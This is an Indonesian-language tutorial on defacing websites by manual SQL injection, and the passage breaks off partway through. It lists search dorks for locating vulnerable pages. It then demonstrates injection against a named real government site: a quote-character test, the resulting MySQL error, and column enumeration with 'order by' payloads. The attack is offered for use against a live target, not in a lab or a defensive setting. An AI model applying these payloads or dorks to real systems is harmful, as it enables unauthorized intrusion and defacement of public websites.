tutorial deface sql injection
Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual dork : - inurl:/staff.php?id= - inurl:/news.php?id= kembangin sendiri gan. Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh : http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- Kalian Terusin Sampai Ketemu Error ,jadinya http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+